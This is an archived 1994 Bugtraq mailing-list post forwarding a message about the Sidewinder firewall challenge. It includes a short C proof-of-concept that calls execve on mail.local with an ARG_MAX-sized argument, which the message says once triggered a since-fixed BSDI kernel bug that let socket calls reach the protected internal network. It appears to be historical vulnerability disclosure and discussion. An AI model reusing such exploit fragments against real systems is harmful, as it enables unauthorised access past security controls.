Yesterday this would have worked... (fwd)

Matthew Harding (matt@worldlinx.com)
Fri, 16 Dec 1994 14:12:51 -0500 (EST)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Kimmo Suominen: "Re: toward a binmail replacement"
Previous message: William McVey: "Re: regarding the (ex)preserve holes"
Next in thread: der Mouse: "Re: Yesterday this would have worked... (fwd)"

Oops, I posted the previous message to bugtraq not realizing that SCTC
originally sent the message to the sneakers list. Here is the original
message posted with permission, 10 points to anyone who can spot the
supposed flaw in the BSDI O/S with this. BTW, anyone care to comment if
this should be replicable across platforms?

Cheers,
Matthew (matt@worldlinx.com)


Forwarded message:
> From owner-sneakers@CS.YALE.EDU Wed Dec 14 15:07:45 1994
> Message-Id: <199412141927.NAA06239@spirit.sctc.com>
> Date: 14 Dec 1994 13:35:25 -0600
> From: Glenn Andreas <andreas@sctc.com>
> Subject: Yesterday this would have worked...
> To: "sneakers@CS.YALE.EDU" <sneakers@CS.YALE.EDU>
> X-Mailer: Mail*Link PT/Internet 1.0.1
> Sender: owner-sneakers@CS.YALE.EDU
> Precedence: bulk
> 
> 
> For those of you who think that the Sidewinder challenge was impossible, the
> following code fragment would have allowed you to get at the internal net and
> win a jacket.  This, of course, was yesterday (and the kernel has since be
> fixed).  You just would have had to add this fragment at the beginning of
> your favorite telnet client code (or whatever you wanted to use to get at the
> otherside of the network), and suddenly all your socket, bind, etc... calls
> would succeed.  As for exactly how this fragment worked, that would be
> telling... (but suffice it to say that this approach won't help when we go to
> 4.4, but probably not for the obvious reasons).
> 
> 
> #include <unistd.h>
> #include <sys/param.h>
> 
> ....
> main(argc, argv, envp)
> int argc;
> char **argv, **envp;
> {
>        char *argv1[2];
> 
>         /* build our new argv... */
>         argv1[0] = malloc(ARG_MAX+1);
>         memset(argv1[0],'x',ARG_MAX);
>         argv1[0][ARG_MAX] = 0;
>         argv1[1] = NULL;
>         /* exercise the bug... */
>         execve("/usr/libexec/mail.local",argv1,envp);
>         /* and at this point we can get at the net... */
> [ insert your favorite telnet client code here.... ]
> 
> 
> 
> ---
> "You think that's funny?  I'll show you funny..."
> 
>

Next message: Kimmo Suominen: "Re: toward a binmail replacement"
Previous message: William McVey: "Re: regarding the (ex)preserve holes"
Next in thread: der Mouse: "Re: Yesterday this would have worked... (fwd)"